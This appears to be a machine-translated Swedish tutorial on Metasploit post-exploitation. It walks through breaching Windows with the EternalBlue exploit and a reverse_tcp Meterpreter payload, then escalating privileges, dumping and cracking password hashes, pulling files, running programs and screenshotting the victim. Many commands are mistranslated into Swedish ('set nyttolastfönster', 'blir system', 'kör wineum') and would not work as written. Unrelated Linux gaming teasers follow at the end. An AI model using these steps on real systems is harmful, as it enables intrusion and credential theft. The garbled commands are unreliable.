metasploit

Efter exploatering med Meterpreter

Efter exploatering med Meterpreter
Detta är en introduktion till Meterpreter-nyttolast-pluginet inom Metasploit. I den här korta handledningen kommer vi att diskutera hur man använder den för att tillämpa efterutnyttjande på ett WINDOWS OS-system när du redan har brutit mot det med Eternalblue-exploateringen. Vi kommer att begränsa oss till att komma åt Windows-systemet och utforska det, och alla saker vi ska göra kommer att fokusera på åtkomst till information och användaruppgifter.

Introduktion till Meterpreter

Meterpreter är en attack nyttolast i Metasploit-ramverket som låter gärningsmannen styra och navigera offrets dator genom ett kommandoskal. Det kan visa sig vara ett mycket mångsidigt verktyg när det gäller penetrationstestning.  Det är ett verktyg efter utnyttjande som är baserat på DLL-injektion i minnet, vilket innebär att den injicerade DLL-filen körs genom att skapa en ny process som kräver att systemet kör den injicerade DLL-filen. Det kan ge dig tillgång till ett osynligt kommandoskal på en offermaskin, så att du kan köra körbara filer och profilnätverk.

Den skrevs ursprungligen för Metasploit 2.x och uppgraderas för Metasploit 3.

Vi kommer att diskutera användningen av Meterpreter i detalj, men innan det, låt oss ha ett ord om nyttolast i allmänhet

Vad är nyttolaster?

Nyttolast i Metasploit är moduler, vilket betyder att de är kodavsnitt inom Metasploit som körs på det fjärrsystem vi riktar oss till. Utnyttjandemodulen skickas först, som installerar nyttolastmodulen på systemet. Sedan ger nyttolast tillgång till angriparen (begränsad eller fullfjädrad, beror på innehållet i nyttolasten). För att vidareutveckla nyttolastens funktion måste vi diskutera dess typer, som är totalt 3:

Singel

Dessa nyttolaster är helt fristående, vilket innebär att dessa kan vara lika grundläggande som gatekeeper-koder som låter användaren komma in i ett målsystem.

Stagers

Stagers är nyttolaster som samlar applikationer inom målsystemet och skickar det till angriparen. Det etablerar anslutningen mellan offret till vår lokala maskin.

Stadier

När insatserna har tillgång till systemet laddar de ner scenmodulerna. Stegmoduler tar bort måttlådans storlek.

Exempel på steg kan vara ett enkelt skal, iPhone 'ipwn' skal, Meterpreter-moduler, VNC-injektion.

Du kan räkna ut typen av nyttolast genom att räkna ut dess namn. Enstaka nyttolaster har vanligtvis formatet /

Utnyttjande med Meterpreter

Först och främst startar du msf-konsolen genom att skriva följande terminalkommando i Kali-terminalfönstret.

$ sudo msfconsole

Vi använder reverse_tcp som stager och Meterpreter som scen.

Vi börjar med att ställa in Eternal Blue-exploateringen. Välj (ms17_010_eternalblue) och ställ sedan in windows / x64 / meterpreter / reverse_tcp som vald nyttolast

Konfigurera sedan exploateringsinställningarna och kör sedan exploit med exploit-kommandot:

$ set nyttolastfönster / x64 / meterpreter / reverse_tcp
$ set rhost 192.168.198.136
$ utnyttja

De Eternalblue utnyttja har aktiverats.

Efter exploatering

Vi får åtkomst till och manipulerar det redan komprometterade systemet under efter exploateringen.

Vi kan göra en hel del saker nu när vi har tillgång till systemet, men som nämnts ovan ska vi förbli fokuserade på att ladda ner information och få användaruppgifter här

Hantera åtkomstbehörighet:

Beroende på nyttolastmodulen och utnyttjandet som du har använt kan du komma att ställas inför vissa åtkomstbegränsningar som allvarligt försvagar dina förmågor att manövrera offermaskinen. Du kan komma runt problemet med privilegieringsökning genom att radera lösenord och manipulera med registren. Du kan också eskalera privilegier genom att använda Meterpreters get system-command.

$ blir system
$ getuid

Filöverföring med Meterpreter

Med Meterpreter kan du ladda ner en fil med kommandot $ download.

$ nedladdning / windows / system32 / drivrutiner / etc / värdar

På samma sätt kan du ladda upp information till maskinen med hjälp av $ upload-kommando

Extrahera användaruppgifter:

Använd kodskript credential_collector för att extrahera information om användarkonton eller använd hash dump-postmodulen till liknande effekt.

Vi kommer att använda modulen hash dump post för att fortsätta med att skörda referenserna. Skriv följande msf-kommando.

$ kör post / windows / samla / hashdump

Som vi kan se har vi fått Coen-, gäst- och adminkonton. LM-hash (admin) och NTLM (gäst) hash avser tomma lösenord, medan Coen-hash är ett lösenord som du måste knäcka. Du kan göra det med en lösenordssmällare.

Automatisera systemskrapning

Det kan vara tråkigt att samla in information med individuella inmatningsuttalanden om att du måste fortsätta mata kommandoskalet. Bekvämt kan du automatisera denna process något med vinstockar. Skriptet samlar in information från offret och laddar ner data till vår lokala maskin. Du får veta var utdata sparas, som du kan se i fjärde raden ovanifrån:

$ kör wineum

Tänk på att sökvägen där utdata till varje kommando lagras kan skilja sig från den som visas här.

Låter röra lite mer

Köra filer

Du kan köra valfri fil på systemet med: execute -f . Detta inkluderar både körbara filer och program med flera stödfiler. Om du till exempel vill köra den inbyggda räknarappen i Windows OS, skriv execute -f calc.exe

Ta skärmdumpar

Du kan också ta skärmdumpar från användarens synvinkel. Skriv bara skärmdump i Meterpreters kommandoskal så får du en skärmdump av skärmen på systemet.

$ execute -f calc.exe
$ skärmdump

Slutsats:

Detta har varit en kort introduktion till Meterpreter-plugin i Metasploit-ramverket, tillsammans med en kort guide som visar de mest grundläggande användningsområdena. Vi har lärt oss här hur vi kan bryta mot ett Windows OS-system med Eternalblue utnyttja för att få åtkomst, använd sedan Meterpreter för att eskalera behörigheter, samla in information manuellt och genom det automatiserade vinekommandot. Vi har också lärt oss hur man kör filer på offermaskinen.

Meterpreter kan fungera som ett märkbart sätt att upptäcka sårbarhet, trots att det är en grupp av grundläggande verktyg inom Metasploits ram.

Gratis och öppen källkodsmotorer för utveckling av Linux-spel
Den här artikeln kommer att täcka en lista över gratis motorer med öppen källkod som kan användas för att utveckla 2D- och 3D-spel på Linux. Det finns...
Shadow of the Tomb Raider for Linux Tutorial
Shadow of the Tomb Raider är det tolfte tillskottet till Tomb Raider-serien - en action-äventyrsspelfranchise skapad av Eidos Montreal. Spelet mottogs...
Hur man förbättrar FPS i Linux?
FPS står för Bildrutor per sekund. FPS: s uppgift är att mäta bildfrekvensen i videouppspelningar eller spelprestanda. Med enkla ord betecknas antalet...